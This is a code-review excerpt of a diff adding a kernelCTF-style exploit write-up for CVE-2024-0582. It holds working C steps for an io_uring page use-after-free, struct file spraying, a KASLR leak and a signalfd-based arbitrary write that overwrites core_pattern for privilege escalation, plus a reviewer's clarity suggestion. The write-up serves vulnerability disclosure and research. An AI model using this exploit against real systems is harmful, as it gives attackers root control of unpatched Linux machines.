pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md

```diff
@@ -0,0 +1,1201 @@
+                   &reg, 1));
+
+    pbuf_mappings[i] =
+        SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd,
+                    IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT)));
+    logi("[pbuf %d] mapped at %p", i, pbuf_mappings[i]);
+  }
+```
+
+Trigger page UAF:
+
+```c
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg unreg = {.bgid = i};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd,
+                   IORING_UNREGISTER_PBUF_RING, &unreg, 1));
+  }
+```
+
+Spray enough `struct file` to reuse the UAF page from PCP list
+
+```c
+  char buf[1024] = {};
+  for (int i = 0; i < SPRAY_FILE_NUM; i++) {
+    spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+    // later we can observe the write retval at victim_file->f_pos
+    SYSCHK(write(spray_fds[i], buf, i));
+  }
+```
+
+Locate victim_file:
+
+```c
+  void *victim_file_addr = NULL;
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    if (victim_file_addr)
+      break;
+    for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) {
+      size_t shmem_file_operations =
+          *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP);
+      if ((shmem_file_operations & 0xfffff) ==
+          (SHMEM_FILE_OPERATIONS & 0xfffff)) {
+        victim_file_addr = pbuf_mappings[i] + j;
+        logi("victim_file_addr %p", victim_file_addr);
+        break;
+      }
+    }
+  }
+```
+
+Get victim_file index and leak kaslr:
+
+```c
+  size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS);
+  size_t shmem_file_operations =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_FOP);
+  size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS;
+  size_t signalfd_fops = SIGNALFD_FOPS + kaslr;
+  size_t core_pattern = CORE_PATTERN + kaslr;
+  size_t private_data_before =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA);
+```
+
+Abuse victim_file to get arbitrary write and overwrite the core_pattern:
+
+```c
+  *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops;
+  char *fake = "|/proc/%P/fd/666 %P";
+  for (int i = 0; i <= strlen(fake); i++) { // include the null byte
+    *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i);
+    size_t mask = ~fake[i];
+    SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0));
+  }
+```
+
+This technique can be checked at [Mind the Gap - Project Zero: November 2022](https://googleprojectzero.blogspot.com/2022/11/#:~:text=struct%20was%20incremented.-,Overwriting%20the%20addr_limit,-Like%20many%20previous):
+
+```c
+static int do_signalfd4(int ufd, sigset_t *mask, int flags)
+{
+	struct signalfd_ctx *ctx;
+
+	/* Check the SFD_* constants for consistency.  */
+	BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);
+	BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);
+
+	if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
+		return -EINVAL;
+
+	sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));

```

Comment:
I would mention that the `sigdelsetmask` call does not bother us as SIGKILL and SIGSTOP clears the bits 8 and 18 but we are using bits 0-7, so this call basically does not change the mask value. I know this fact is in the writeup, but it would make reading the writeup faster.